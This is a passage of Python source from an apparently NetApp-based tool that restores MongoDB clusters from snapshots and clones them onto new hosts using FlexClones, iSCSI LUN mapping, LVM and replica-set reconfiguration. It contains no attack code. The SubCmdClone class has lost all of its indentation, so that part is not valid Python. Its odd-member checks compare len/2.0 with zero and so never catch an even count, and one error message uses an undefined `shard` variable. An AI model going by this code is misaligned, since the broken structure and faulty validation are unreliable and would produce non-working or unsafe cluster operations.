            vgchange = host.disable_vg(vg_name=member['storage_info']['lvm_vgname'])
            if vgchange[1] != 0:
                logging.error('Cannot deactive volume group {}.'.format(member['storage_info']['lvm_vgname']))
                exit(1)
            else:
                logging.info('MongoDB volume group {} has been successfully disabled.'.format(member['storage_info']['lvm_vgname']))
            multipath = host.stop_service('multipathd')
            if multipath[1] != 0:
                logging.error('Cannot stop multipathd on host {}.'.format(member_ip))
                exit(1)
            else:
                logging.info('Multipathd has been successfully stopped on host {}.'.format(member_ip))

    def _resume_member(self, member):
        """Reverse of _quiesce_member: on data-bearing nodes start multipathd,
        reactivate the VG and remount the FS; then start mongod. Exits on failure."""
        member_ip = member['name'].split(':')[0]
        host = HostConn(ipaddr=member_ip, username=self.username)
        # -- For every data bearing node: multipath start, vgchange, mount
        if member['stateStr'] == 'PRIMARY' or member['stateStr'] == 'SECONDARY':
            multipath = host.start_service('multipathd')
            if multipath[1] != 0:
                logging.error('Cannot start multipathd on host {}.'.format(member_ip))
                exit(1)
            else:
                logging.info('Multipathd has been successfully started on host {}.'.format(member_ip))
            vgchange = host.enable_vg(vg_name=member['storage_info']['lvm_vgname'])
            if vgchange[1] != 0:
                logging.error('Cannot activate volume group {} on host {}.'.format(member['storage_info']['lvm_vgname'], member_ip))
                exit(1)
            else:
                logging.info('MongoDB volume group {} has been successfully activated.'.format(member['storage_info']['lvm_vgname']))
            mount_fs = host.mount_fs(fs_mountpoint=member['storage_info']['mountpoint'],
                                     fs_type=member['storage_info']['fs_type'],
                                     device=member['storage_info']['mdb_device'])
            if mount_fs[1] != 0:
                logging.error('Cannot mount MongoDB file system {} on host {}.'.format(member['storage_info']['mountpoint'], member_ip))
                exit(1)
            else:
                logging.info('MongoDB file system {} has been successfully mounted on host {}.'.format(member['storage_info']['mountpoint'], member_ip))
        # -- Starting mongod. NOTE(review): started on every member to mirror
        # the quiesce phase, which stops mongod on arbiters too -- confirm.
        start_mongo = host.start_service('mongod')
        if start_mongo[1] != 0:
            logging.error('Cannot start MongoDB on host {}.'.format(member_ip))
            exit(1)
        else:
            logging.info('MongoDB has been started on host {}.'.format(member_ip))

    def restore(self, catalog_sess=None):
        """Quiesce the cluster, SnapRestore every data volume, bring the
        cluster back up, and prune catalog entries newer than the backup."""
        bkp2restore = catalog_sess.find_one(coll_name='backups', query={'backup_name': self.backup_name,
                                                                        'cluster_name': self.cluster_name})
        if bkp2restore is None:
            logging.error('Backup {} could not be found for cluster {}.'.format(self.backup_name, self.cluster_name))
            exit(1)
        topology = bkp2restore['mongo_topology']
        # -- Preparation phase: quiesce every member
        if topology['cluster_type'] == 'replSet':
            for rs_member in topology['members']:
                self._quiesce_member(rs_member)
        if topology['cluster_type'] == 'sharded':
            for cs_member in topology['config_servers']:
                self._quiesce_member(cs_member)
            for shard_replset in topology['shards']:
                for shard_member in shard_replset['shard_members']:
                    self._quiesce_member(shard_member)
        # -- Restore phase
        snaprestore_list = dict()
        if topology['cluster_type'] == 'replSet':
            self._collect_volumes(topology['members'], snaprestore_list)
        elif topology['cluster_type'] == 'sharded':
            self._collect_volumes(topology['config_servers'], snaprestore_list)
            for shard_replset in topology['shards']:
                self._collect_volumes(shard_replset['shard_members'], snaprestore_list)
        for svm in snaprestore_list.keys():
            svm_info = catalog_sess.find_one(coll_name='ntapsystems', query={'svm-name': svm})
            cs_svm = ClusterSession(svm_info['netapp-ip'], svm_info['username'], svm_info['password'],
                                    svm_info['svm-name'])
            for volume in snaprestore_list[svm]:
                snapspec = dict()
                snapspec['volume'] = volume
                snapspec['snapname'] = self.backup_name
                snapshot = Snapshot(snapspec)
                restore_result = snapshot.restore(cs_svm)
                if restore_result[0] == 'passed':
                    logging.info('Snapshot ' + snapspec['snapname'] + ' has been restored on volume ' + snapspec['volume'])
                else:
                    # best-effort: log and continue with remaining volumes
                    logging.error('Failed to restore snapshot ' + snapspec['snapname'] + ' on volume ' + snapspec['volume'] + '.')
                    logging.error(restore_result[1])
        # -- Post restore phase: bring every member back up
        if topology['cluster_type'] == 'replSet':
            for rs_member in topology['members']:
                self._resume_member(rs_member)
        if topology['cluster_type'] == 'sharded':
            for cs_member in topology['config_servers']:
                self._resume_member(cs_member)
            for shard_replset in topology['shards']:
                for shard_member in shard_replset['shard_members']:
                    self._resume_member(shard_member)
        # -- Housekeeping on backup's metadata: drop entries newer than the
        # restored backup, since their state no longer exists on disk
        catalog_sess.remove_many(coll_name='backups', query={'created_at':
                                                             {'$gt': bkp2restore['created_at']}})
        # -- restore completed
        logging.info('Restore operation has been completed.')
class SubCmdClone:
def __init__(self, clone_args=None):
if clone_args['backup-name'] is not None:
self.backup_name = clone_args['backup-name']
if clone_args['cluster-name'] is not None:
self.cluster_name = clone_args['cluster-name']
if clone_args['desc'] is not None:
self.desc = clone_args['desc']
else:
self.desc = ''
self.clone_name = clone_args['clone-name']
self.clone_spec = clone_args['clone-spec']
self.username = clone_args['username']
self.clone_uid = time()
def create_storage_clone(self, kdb_session=None):
kdb_backup = kdb_session['backups']
bkp2clone = kdb_backup.find_one({'backup_name': self.backup_name, 'cluster_name': self.cluster_name})
if bkp2clone is None:
logging.error('Cannot find backup {} for cluster {}.'.format(self.backup_name, self.cluster_name))
exit(1)
# -- checking if clone spec file has the required number of members per replicaset
if self.clone_spec['cluster_type'] == 'replicaSet':
odd_members = len(self.clone_spec['replset']['members']) / 2.0
if odd_members == 0:
logging.error('You need an odd number of members to establish a replicaSet.')
exit(1)
elif self.clone_spec['cluster_type'] == 'sharded':
odd_cs_members = len(self.clone_spec['config_servers']['members']) / 2.0
if odd_cs_members == 0:
logging.error('You need an odd number of members to establish a CSRS.')
exit(1)
for shard in self.clone_spec['shards']:
odd_sh_members = len(shard['shard_members']) / 2.0
if odd_sh_members == 0:
logging.error('You need an odd number of members to establish a shard.')
exit(1)
# -- cloned cluster structure
cloned_cluster = dict()
cloned_cluster['cluster_type'] = self.clone_spec['cluster_type']
if self.clone_spec['cluster_type'] == 'replicaSet':
cloned_cluster['setname'] = self.clone_spec['replset']['setname']
cloned_cluster['members'] = list()
cloned_cluster['reconfig'] = dict()
elif self.clone_spec['cluster_type'] == 'sharded':
cloned_cluster['config_servers'] = dict()
cloned_cluster['config_servers']['setname'] = self.clone_spec['config_servers']['setname']
cloned_cluster['config_servers']['members'] = list()
cloned_cluster['config_servers']['reconfig'] = dict()
cloned_cluster['shards'] = list()
# -- replicaSet and shard reconfig -- rc stands for reconfig
# -- cc_cs stands for cloned_cluster config server
# -- cc_sh stands for cloned_cluster shard
if self.clone_spec['cluster_type'] == 'replicaSet':
count = 0
rc_members = dict()
for spec_member in self.clone_spec['replset']['members']:
rc_members['members.' + str(count) + '.host'] = spec_member['hostname'] + ':' + spec_member['port']
rc_members['members.' + str(count) + '.arbiterOnly'] = spec_member['arbiter_only']
count += 1
cloned_cluster['reconfig'] = rc_members
elif self.clone_spec['cluster_type'] == 'sharded':
# -- config server reconfig
count = 0
rc_cs_members = dict()
for spec_cs_member in self.clone_spec['config_servers']['members']:
rc_cs_members['members.' + str(count) + '._id'] = count
rc_cs_members['members.' + str(count) + '.host'] = spec_cs_member['hostname'] + ':' + \
spec_cs_member['port']
rc_cs_members['members.' + str(count) + '.arbiterOnly'] = spec_cs_member['arbiter_only']
rc_cs_members['members.' + str(count) + '.buildIndexes'] = True
rc_cs_members['members.' + str(count) + '.hidden'] = False
rc_cs_members['members.' + str(count) + '.priority'] = 1
rc_cs_members['members.' + str(count) + '.tags'] = dict()
rc_cs_members['members.' + str(count) + '.slaveDelay'] = 0
rc_cs_members['members.' + str(count) + '.votes'] = 1
count += 1
cloned_cluster['config_servers']['reconfig'] = rc_cs_members
# -- Stage 1 :: Setting it up -------------------
if self.clone_spec['cluster_type'] == 'sharded':
for spec_cs_member in self.clone_spec['config_servers']['members']:
if spec_cs_member['arbiter_only']:
cloned_cluster['config_servers']['members'].append(spec_cs_member)
continue
config_server = spec_cs_member
host = HostConn(ipaddr=spec_cs_member['hostname'], username=self.username)
igroup_spec = dict()
result_get_hostname = host.get_hostname()
if result_get_hostname[1] != 0:
logging.error('Could not get hostname from host {}.'.format(spec_cs_member['hostname']))
exit(1)
else:
logging.info('Preparing initiator group for host {}.'.format(spec_cs_member['hostname']))
igroup_spec['igroup-name'] = 'ig_' + result_get_hostname[0].strip('\n') + '_' + self.clone_name
igroup_spec['igroup-type'] = spec_cs_member['protocol']
igroup_spec['os-type'] = 'linux'
if spec_cs_member['protocol'] == 'iscsi':
result_get_iqn = host.get_iscsi_iqn()
if result_get_iqn[1] != 0:
logging.error('Could not get initiator name from host {}.'.format(spec_cs_member['hostname']))
exit(1)
else:
logging.info('Collecting initiator name on host {}.'.format(spec_cs_member['hostname']))
config_server['initiator'] = result_get_iqn[0].split('=')[1].strip()
config_server['igroup'] = InitiatorGroup(igroup_spec)
host.close()
config_server['volclone_topology'] = list()
config_server['lun_mapping'] = list()
for bkp_cs in bkp2clone['mongo_topology']['config_servers']:
if bkp_cs['stateStr'] == spec_cs_member['clone_from'].upper():
config_server['storage_info'] = dict()
config_server['storage_info']['lvm_vgname'] = bkp_cs['storage_info']['lvm_vgname']
config_server['storage_info']['fs_type'] = bkp_cs['storage_info']['fs_type']
config_server['storage_info']['mdb_device'] = bkp_cs['storage_info']['mdb_device']
for vol in bkp_cs['storage_info']['volume_topology']:
clone_spec = dict()
clone_spec['volume'] = self.clone_name + '_' + vol['volume'] + '_' + str(int(self.clone_uid))
clone_spec['parent-volume'] = vol['volume']
clone_spec['parent-snapshot'] = self.backup_name
flexclone = FlexClone(clone_spec)
config_server['volclone_topology'].append(flexclone)
logging.info('Volume {} ready to be cloned as {} on host {}'.format(vol['volume'],
clone_spec['volume'],
spec_cs_member['hostname']
))
lun_spec = dict()
lun_spec['path'] = '/vol/' + clone_spec['volume'] + '/' + vol['lun-name']
lun_spec['igroup-name'] = igroup_spec['igroup-name']
lun_map = Lun(lun_spec)
config_server['lun_mapping'].append(lun_map)
logging.info('Preparing LUN {} to be mapped to igroup {}.'.format(lun_spec['path'],
lun_spec['igroup-name']
))
break
cloned_cluster['config_servers']['members'].append(config_server)
for spec_shard in self.clone_spec['shards']:
shard_replset = dict()
shard_replset['name'] = spec_shard['shard_name']
shard_replset['members'] = list()
shard_replset['reconfig'] = dict()
# -- preparing shard replicaset reconfig document
count = 0
rc_sh_members = dict()
for spec_sh_member in spec_shard['shard_members']:
rc_sh_members['members.' + str(count) + '._id'] = count
rc_sh_members['members.' + str(count) + '.host'] = spec_sh_member['hostname'] + ':' + \
spec_sh_member['port']
rc_sh_members['members.' + str(count) + '.arbiterOnly'] = spec_sh_member['arbiter_only']
rc_sh_members['members.' + str(count) + '.buildIndexes'] = True
rc_sh_members['members.' + str(count) + '.hidden'] = False
rc_sh_members['members.' + str(count) + '.priority'] = 1
rc_sh_members['members.' + str(count) + '.tags'] = dict()
rc_sh_members['members.' + str(count) + '.slaveDelay'] = 0
rc_sh_members['members.' + str(count) + '.votes'] = 1
count += 1
shard_replset['reconfig'] = rc_sh_members
for spec_sh_member in spec_shard['shard_members']:
member = dict()
if spec_sh_member['arbiter_only']:
shard_replset['members'].append(spec_sh_member)
continue
member = spec_sh_member
host = HostConn(ipaddr=spec_sh_member['hostname'], username=self.username)
igroup_spec = dict()
result_get_hostname = host.get_hostname()
if result_get_hostname[1] != 0:
logging.error('Could not get hostname from host {}.'.format(spec_sh_member['hostname']))
exit(1)
else:
logging.info('Preparing initiator group for host {}.'.format(spec_sh_member['hostname']))
igroup_spec['igroup-name'] = 'ig_' + result_get_hostname[0].strip('\n') + '_' + self.clone_name
igroup_spec['igroup-type'] = spec_sh_member['protocol']
igroup_spec['os-type'] = 'linux'
if spec_sh_member['protocol'] == 'iscsi':
result_get_iqn = host.get_iscsi_iqn()
if result_get_iqn[1] != 0:
logging.error('Could not get initiator name from host {}.'.format(spec_sh_member['hostname']))
exit(1)
else:
logging.info('Collecting initiator name on host {}.'.format(spec_sh_member['hostname']))
member['initiator'] = result_get_iqn[0].split('=')[1].strip()
member['igroup'] = InitiatorGroup(igroup_spec)
host.close()
member['volclone_topology'] = list()
member['lun_mapping'] = list()
for bkp_shard in bkp2clone['mongo_topology']['shards']:
for bkp_shard_member in bkp_shard['shard_members']:
if (bkp_shard_member['stateStr'] == spec_sh_member['clone_from'].upper()) and (
bkp_shard['shard_name'] == spec_shard['shard_name']):
member['storage_info'] = dict()
member['storage_info']['lvm_vgname'] = bkp_shard_member['storage_info']['lvm_vgname']
member['storage_info']['fs_type'] = bkp_shard_member['storage_info']['fs_type']
member['storage_info']['mdb_device'] = bkp_shard_member['storage_info']['mdb_device']
for vol in bkp_shard_member['storage_info']['volume_topology']:
if vol['svm-name'] != spec_sh_member['svm-name']:
logging.error('You are asking a clone from a {} member on svm {}, but there is no {} on svm {} for shard {} on backup {}'.format(
spec_sh_member['clone_from'], spec_sh_member['svm-name'], spec_sh_member['clone_from'],
spec_sh_member['svm-name'], shard['shard_name'], self.backup_name
))
exit(1)
clone_spec = dict()
clone_spec['volume'] = self.clone_name + '_' + vol['volume'] + '_' + str(
int(self.clone_uid))
clone_spec['parent-volume'] = vol['volume']
clone_spec['parent-snapshot'] = self.backup_name
flexclone = FlexClone(clone_spec)
member['volclone_topology'].append(flexclone)
logging.info('Volume {} ready to be cloned as {} on host {}'.format(vol['volume'],
clone_spec['volume'],
spec_sh_member['hostname']
))
lun_spec = dict()
lun_spec['path'] = '/vol/' + clone_spec['volume'] + '/' + vol['lun-name']
lun_spec['igroup-name'] = igroup_spec['igroup-name']
lun_map = Lun(lun_spec)
member['lun_mapping'].append(lun_map)
logging.info('Preparing LUN {} to be mapped to igroup {}.'.format(lun_spec['path'],
lun_spec['igroup-name']
))
shard_replset['members'].append(member)
break
cloned_cluster['shards'].append(shard_replset)
# -- Stage 2 :: Executing it
# -- running steps to clone config servers
for cs in cloned_cluster['config_servers']['members']:
# -- Preparing recover and normal mode start string
if self.clone_spec['defaults']['dir_per_db']:
recover_mode = '/usr/bin/mongod --logpath ' + self.clone_spec['defaults']['log_path'] + \
' --dbpath ' + cs['mountpoint'] + ' --bind_ip ' + cs['hostname'] + ' --port ' + \
cs['port'] + ' --fork --directoryperdb'
normal_mode = '/usr/bin/mongod --logpath ' + self.clone_spec['defaults']['log_path'] + \
' --dbpath ' + cs['mountpoint'] + ' --bind_ip ' + cs['hostname'] + ' --port ' + \
cs['port'] + ' --replSet ' + cloned_cluster['config_servers']['setname'] + \
' --fork --directoryperdb --configsvr'
else:
recover_mode = '/usr/bin/mongod --logpath ' + self.clone_spec['defaults']['log_path'] + \
' --dbpath ' + cs['mountpoint'] + ' --bind_ip ' + cs['hostname'] + ' --port ' + \
cs['port'] + ' --fork'
normal_mode = '/usr/bin/mongod --logpath ' + self.clone_spec['defaults']['log_path'] + \
' --dbpath ' + cs['mountpoint'] + ' --bind_ip ' + cs['hostname'] + ' --port ' + \
cs['port'] + ' --replSet ' + cloned_cluster['config_servers']['setname'] + \
' --fork --configsvr'
# -- openning a ssh connection to run host side commands
host = HostConn(ipaddr=cs['hostname'], username=self.username)
# -- if member is only an arbiter, there isn't any netapp action to be taken.
if cs['arbiter_only']:
# -- removing mongod.lock and mongod.pid
host.remove_file(cs['mountpoint'] + '/mongod.lock')
host.remove_file('/var/run/mongodb/mongod.pid')
result = host.run_command('/sbin/runuser -l mongod -g mongod -c "' + recover_mode + '"')
if result[1] != 0:
logging.error('Cannot start mongodb in recover mode on host {}.'.format(cs['hostname']))
exit(1)
else:
logging.info('MongoDB has been started in recover mode on host {}.'.format(cs['hostname']))
# -- Updating ReplicaSet info
mdb_uri = 'mongodb://' + cs['hostname'] + ':' + cs['port']
mdb_session = MongoDBCluster(mongodb_uri=mdb_uri)
mdb_session.update_doc(dbname='local', collection='system.replset',
update_filter={'_id': cloned_cluster['config_servers']['setname']},
update_doc={'$unset': {'members': ''}}
)
mdb_session.update_doc(dbname='local', collection='system.replset',
update_filter={'_id': cloned_cluster['config_servers']['setname']},
update_doc={'$set': {'members': []}}
)
mdb_session.update_doc(dbname='local', collection='system.replset',
update_filter={'_id': cloned_cluster['config_servers']['setname']},
update_doc={'$set': cloned_cluster['config_servers']['reconfig']}
)
# -- Stopping MongoDB recover mode
result = host.run_command('pkill mongod')
if result[1] != 0:
logging.error('Cannot kill mongoDB on host {}'.format(cs['hostname']))
exit(1)
else:
logging.info('MongoDB has been stopped on host {}.'.format(cs['hostname']))
host.remove_file(cs['mountpoint'] + '/mongod.lock')
host.remove_file('/var/run/mongodb/mongod.pid')
sleep(5)
# -- Starting MongoDB normal mode
result = host.run_command('/sbin/runuser -l mongod -g mongod -c "' + normal_mode + '"')
if result[1] != 0:
logging.error('Cannot start mongodb in normal mode on host {}.'.format(cs['hostname']))
exit(1)
else:
logging.info('MongoDB has been started in normal mode on host {}.'.format(cs['hostname']))
host.close()
continue
kdb_ntapsys = kdb_session['ntapsystems']
ntapsys = kdb_ntapsys.find_one({'svm-name': cs['svm-name']})
if ntapsys is None:
logging.error('Cannot find SVM {} in the netapp repository collection.'.format(cs['svm-name']))
exit(1)
svm_session = ClusterSession(cluster_ip=ntapsys['netapp-ip'], user=ntapsys['username'],
password=ntapsys['password'], vserver=ntapsys['svm-name'])
result = cs['igroup'].create(svm=svm_session)
if result[0] == 'failed':
logging.error('Failed to create initiator group {} for host {}.'.format(cs['igroup'].initiator_group_name,
cs['hostname']))
exit(1)
else:
logging.info('Initiator group {} has been created for host {}.'.format(cs['igroup'].initiator_group_name,
cs['hostname']))
result = cs['igroup'].add_initiators(svm=svm_session, initiator_list=cs['initiator'])
if result[0] == 'failed':
logging.error('Failed to add initiator {} to igroup {} for host {}.'.format(cs['initiator'],
cs['igroup'].initiator_group_name,
cs['hostname']))
exit(1)
else:
logging.info('Initiator {} has been added to {} for host {}.'.format(cs['initiator'],
cs['igroup'].initiator_group_name,
cs['hostname']))
for volclone in cs['volclone_topology']:
result = volclone.create(svm=svm_session)
if result[0] == 'failed':
logging.error('Failed to create flexclone {} for host {}.'.format(volclone.volume,
cs['hostname']))
exit(1)
else:
logging.info('FlexClone {} has been created.'.format(volclone.volume))
for lun in cs['lun_mapping']:
result = lun.mapping(svm=svm_session)
if result[0] == 'failed':
logging.error('Failed to map LUN {} to igroup {} for host {}.'.format(lun.path,
lun.igroup_name,
cs['hostname']))
exit(1)
else:
logging.info('LUN {} has been mapped to igroup {} for host {}.'.format(lun.path,
lun.igroup_name,
cs['hostname']))
result = host.iscsi_send_targets(iscsi_target=cs['iscsi_target'])
if result[1] != 0:
logging.error('{} on host {}'.format(result[0], cs['hostname']))
exit(1)
else:
logging.info('Discovering targets on {} for host {}.'.format(cs['iscsi_target'], cs['hostname']))
result = host.iscsi_node_login()
if result[1] != 0:
logging.error('{} on host {}.'.format(result[0], cs['hostname']))
exit(1)
else:
logging.info('Logged in to {} targets and ready to rescan devices on host {}.'.format(cs['igroup'].initiator_group_type,
cs['hostname']))
result = host.iscsi_rescan()
if result[1] != 0:
logging.error('Could not rescan {} devices on host {}.'.format(cs['igroup'].initiator_group_type,
cs['hostname']))
exit(1)
else:
logging.info('{} devices have been scanned on host {}.'.format(cs['igroup'].initiator_group_type,
cs['hostname']))
result = host.enable_vg(vg_name=cs['storage_info']['lvm_vgname'])
if result[1] != 0:
logging.error('Could not enable volume group {} on host {}.'.format(cs['storage_info']['lvm_vgname'],
cs['hostname']))
exit(1)
else:
logging.info('Volume Group {} has been activated on host {}.'.format(cs['storage_info']['lvm_vgname'],
cs['hostname']))
result = host.mount_fs(fs_mountpoint=cs['mountpoint'], fs_type=cs['storage_info']['fs_type'],
device=cs['storage_info']['mdb_device'])
if result[1] != 0:
logging.error('Could not mount device {} on host {}.'.format(cs['storage_info']['mdb_device'],
cs['hostname']))
exit(1)
else:
logging.info('Device {} has been mounted to {} on host {}.'.format(cs['storage_info']['mdb_device'],
cs['mountpoint'],
cs['hostname']))
# -- Starting MongoDB on recover mode
result = host.run_command('/sbin/runuser -l mongod -g mongod -c "' + recover_mode + '"')
if result[1] != 0:
logging.error('Cannot start mongodb in recover mode on host {}.'.format(cs['hostname']))
exit(1)
else:
logging.info('MongoDB has been started in recover mode on host {}.'.format(cs['hostname']))
# -- Updating ReplicaSet info
mdb_uri = 'mongodb://' + cs['hostname'] + ':' + cs['port']
mdb_session = MongoDBCluster(mongodb_uri=mdb_uri)
mdb_session.update_doc(dbname='local', collection='system.replset',
update_filter={'_id': cloned_cluster['config_servers']['setname']},
update_doc={'$unset': {'members': ''}}
)
mdb_session.update_doc(dbname='local', collection='system.replset',
update_filter={'_id': cloned_cluster['config_servers']['setname']},
update_doc={'$set': {'members': []}}
)
mdb_session.update_doc(dbname='local', collection='system.replset',
update_filter={'_id': cloned_cluster['config_servers']['setname']},
update_doc={'$set': cloned_cluster['config_servers']['reconfig']}
)
mdb_session.delete_doc(dbname='admin', collection='system.version',
delete_filter={'_id': 'minOpTimeRecovery'})
for spec_shard in self.clone_spec['shards']:
shard_string = spec_shard['shard_name'] + '/'
count = 1
for spec_sh_member in spec_shard['shard_members']:
if count < len(spec_shard['shard_members']):
shard_string += spec_sh_member['hostname'] + ':' + spec_sh_member['port'] + ','
elif count == len(spec_shard['shard_members']):
shard_string += spec_sh_member['hostname'] + ':' + spec_sh_member['port']
count += 1
mdb_session.update_doc(dbname='config', collection='shards',
update_filter={'_id': spec_shard['shard_name']},
update_doc={'$set': {'host': shard_string}})
# -- Stopping MongoDB recover mode
result = host.run_command('pkill mongod')
if result[1] != 0:
logging.error('Cannot kill mongoDB on host {}'.format(cs['hostname']))
exit(1)
else:
logging.info('MongoDB has been stopped on host {}.'.format(cs['hostname']))
host.remove_file(cs['mountpoint'] + '/mongod.lock')
host.remove_file('/var/run/mongodb/mongod.pid')
sleep(5)
# -- Starting MongoDB normal mode
result = host.run_command('/sbin/runuser -l mongod -g mongod -c "' + normal_mode + '"')
if result[1] != 0:
logging.error('Cannot start mongodb in normal mode on host {}.'.format(cs['hostname']))
exit(1)
else:
logging.info('MongoDB has been started in normal mode on host {}.'.format(cs['hostname']))
host.close()
# -- running steps to clone shards
for shard in cloned_cluster['shards']:
for shard_member in shard['members']:
# -- Preparing recover and normal mode start string
if self.clone_spec['defaults']['dir_per_db']:
recover_mode = '/usr/bin/mongod --logpath ' + self.clone_spec['defaults']['log_path'] + \
' --dbpath ' + shard_member['mountpoint'] + ' --bind_ip ' + shard_member['hostname'] + ' --port ' + \
shard_member['port'] + ' --fork --directoryperdb'
normal_mode = '/usr/bin/mongod --logpath ' + self.clone_spec['defaults']['log_path'] + \
' --dbpath ' + shard_member['mountpoint'] + ' --bind_ip ' + shard_member['hostname'] + ' --port ' + \
shard_member['port'] + ' --replSet ' + shard['name'] + \
' --fork --directoryperdb --shardsvr'
else:
recover_mode = '/usr/bin/mongod --logpath ' + self.clone_spec['defaults']['log_path'] + \
' --dbpath ' + shard_member['mountpoint'] + ' --bind_ip ' + shard_member['hostname'] + ' --port ' + \
shard_member['port'] + ' --fork'
normal_mode = '/usr/bin/mongod --logpath ' + self.clone_spec['defaults']['log_path'] + \
' --dbpath ' + shard_member['mountpoint'] + ' --bind_ip ' + shard_member['hostname'] + ' --port ' + \
shard_member['port'] + ' --replSet ' + shard['name'] + ' --fork --shardsvr'
# -- openning a ssh connection to run host side commands
host = HostConn(ipaddr=shard_member['hostname'], username=self.username)
# -- if member is only an arbiter, there isn't any netapp action to be taken.
if shard_member['arbiter_only']:
# -- removing mongod.lock and mongod.pid
host.remove_file(shard_member['mountpoint'] + '/mongod.lock')
host.remove_file('/var/run/mongodb/mongod.pid')
result = host.run_command('/sbin/runuser -l mongod -g mongod -c "' + recover_mode + '"')
if result[1] != 0:
logging.error('Cannot start mongodb in recover mode on host {}.'.format(shard_member['hostname']))
exit(1)
else:
logging.info('MongoDB has been started in recover mode on host {}.'.format(shard_member['hostname']))
# -- Updating ReplicaSet info
mdb_uri = 'mongodb://' + shard_member['hostname'] + ':' + shard_member['port']
mdb_session = MongoDBCluster(mongodb_uri=mdb_uri)
mdb_session.update_doc(dbname='local', collection='system.replset',
update_filter={'_id': shard['name']},
update_doc={'$unset': {'members': ''}}
)
mdb_session.update_doc(dbname='local', collection='system.replset',
update_filter={'_id': shard['name']},
update_doc={'$set': { 'members': []}}
)
mdb_session.update_doc(dbname='local', collection='system.replset',
update_filter={'_id': shard['name']},
update_doc={'$set': shard['reconfig']}
)
# -- Stopping MongoDB recover mode
result = host.run_command('pkill mongod')
if result[1] != 0:
logging.error('Cannot kill mongoDB on host {}'.format(shard_member['hostname']))
exit(1)
else:
logging.info('MongoDB has been stopped on host {}.'.format(shard_member['hostname']))
host.remove_file(shard_member['mountpoint'] + '/mongod.lock')
host.remove_file('/var/run/mongodb/mongod.pid')
sleep(5)
# -- Starting MongoDB normal mode
result = host.run_command('/sbin/runuser -l mongod -g mongod -c "' + normal_mode + '"')
if result[1] != 0:
logging.error('Cannot start mongodb in normal mode on host {}.'.format(shard_member['hostname']))
exit(1)
else:
logging.info('MongoDB has been started in normal mode on host {}.'.format(shard_member['hostname']))
host.close()
continue
kdb_ntapsys = kdb_session['ntapsystems']
ntapsys = kdb_ntapsys.find_one({'svm-name': shard_member['svm-name']})
if ntapsys is None:
logging.error('Cannot find SVM {} in the netapp repository collection.'.format(shard_member['svm-name']))
exit(1)
svm_session = ClusterSession(cluster_ip=ntapsys['netapp-ip'], user=ntapsys['username'],
password=ntapsys['password'], vserver=ntapsys['svm-name'])
result = shard_member['igroup'].create(svm=svm_session)
if result[0] == 'failed':
logging.error(
'Failed to create initiator group {} for host {}.'.format(shard_member['igroup'].initiator_group_name,
shard_member['hostname']))
exit(1)
else:
logging.info(
'Initiator group {} has been created for host {}.'.format(shard_member['igroup'].initiator_group_name,
shard_member['hostname']))
result = shard_member['igroup'].add_initiators(svm=svm_session, initiator_list=shard_member['initiator'])
if result[0] == 'failed':
logging.error('Failed to add initiator {} to igroup {} for host {}.'.format(shard_member['initiator'],
shard_member[
'igroup'].initiator_group_name,
shard_member['hostname']))
exit(1)
else:
logging.info('Initiator {} has been added to {} for host {}.'.format(shard_member['initiator'],
shard_member[
'igroup'].initiator_group_name,
shard_member['hostname']))
for volclone in shard_member['volclone_topology']:
result = volclone.create(svm=svm_session)
if result[0] == 'failed':
logging.error('Failed to create flexclone {} for host {}.'.format(volclone.volume,
shard_member['hostname']))
exit(1)
else:
logging.info('FlexClone {} has been created.'.format(volclone.volume))
for lun in shard_member['lun_mapping']:
result = lun.mapping(svm=svm_session)
if result[0] == 'failed':
logging.error('Failed to map LUN {} to igroup {} for host {}.'.format(lun.path,
lun.igroup_name,
shard_member['hostname']))
exit(1)
else:
logging.info('LUN {} has been mapped to igroup {} for host {}.'.format(lun.path,
lun.igroup_name,
shard_member['hostname']))
result = host.iscsi_send_targets(iscsi_target=shard_member['iscsi_target'])
if result[1] != 0:
logging.error('{} on host {}'.format(result[0], shard_member['hostname']))
exit(1)
else:
logging.info(
'Discovering targets on {} for host {}.'.format(shard_member['iscsi_target'], shard_member['hostname']))
result = host.iscsi_node_login()
if result[1] != 0:
logging.error('{} on host {}.'.format(result[0], shard_member['hostname']))
exit(1)
else:
logging.info('Logged in to {} targets and ready to rescan devices on host {}.'.format(
shard_member['igroup'].initiator_group_type,
shard_member['hostname']))
result = host.iscsi_rescan()
if result[1] != 0:
logging.error(
'Could not rescan {} devices on host {}.'.format(shard_member['igroup'].initiator_group_type,
shard_member['hostname']))
exit(1)
else:
logging.info(
'{} devices have been scanned on host {}.'.format(shard_member['igroup'].initiator_group_type,
shard_member['hostname']))
result = host.enable_vg(vg_name=shard_member['storage_info']['lvm_vgname'])
if result[1] != 0:
logging.error(
'Could not enable volume group {} on host {}.'.format(shard_member['storage_info']['lvm_vgname'],
shard_member['hostname']))
exit(1)
else:
logging.info(
'Volume Group {} has been activated on host {}.'.format(shard_member['storage_info']['lvm_vgname'],
shard_member['hostname']))
result = host.mount_fs(fs_mountpoint=shard_member['mountpoint'], fs_type=shard_member['storage_info']['fs_type'],
device=shard_member['storage_info']['mdb_device'])
if result[1] != 0:
logging.error('Could not mount device {} on host {}.'.format(shard_member['storage_info']['mdb_device'],
shard_member['hostname']))
exit(1)
else:
logging.info(
'Device {} has been mounted to {} on host {}.'.format(shard_member['storage_info']['mdb_device'],
shard_member['mountpoint'],
shard_member['hostname']))
# -- Starting MongoDB on recover mode
result = host.run_command('/sbin/runuser -l mongod -g mongod -c "' + recover_mode + '"')
if result[1] != 0:
logging.error('Cannot start mongodb in recover mode on host {}.'.format(shard_member['hostname']))
exit(1)
else:
logging.info('MongoDB has been started in recover mode on host {}.'.format(shard_member['hostname']))
# -- Updating ReplicaSet info
mdb_uri = 'mongodb://' + shard_member['hostname'] + ':' + shard_member['port']
mdb_session = MongoDBCluster(mongodb_uri=mdb_uri)
mdb_session.update_doc(dbname='local', collection='system.replset',
update_filter={'_id': shard['name']},
update_doc={'$unset': {'members': ''}}
)
mdb_session.update_doc(dbname='local', collection='system.replset',
update_filter={'_id': shard['name']},
update_doc={'$set': {'members': []}}
)
mdb_session.update_doc(dbname='local', collection='system.replset',
update_filter={'_id': shard['name']},
update_doc={'$set': shard['reconfig']}
)
mdb_session.delete_doc(dbname='admin', collection='system.version',
delete_filter={'_id': 'minOpTimeRecovery'})
# -- creating configsrvConnectionString
conn_string = self.clone_spec['config_servers']['setname'] + '/'
for spec_cs_member in self.clone_spec['config_servers']['members']:
hostport = spec_cs_member['hostname'] + ':' + spec_cs_member['port']
conn_string += hostport + ','
mdb_session.update_doc(dbname='admin', collection='system.version',
update_filter={'_id': 'shardIdentity'},
update_doc={'$set': {'configsvrConnectionString': conn_string[:-1]}})
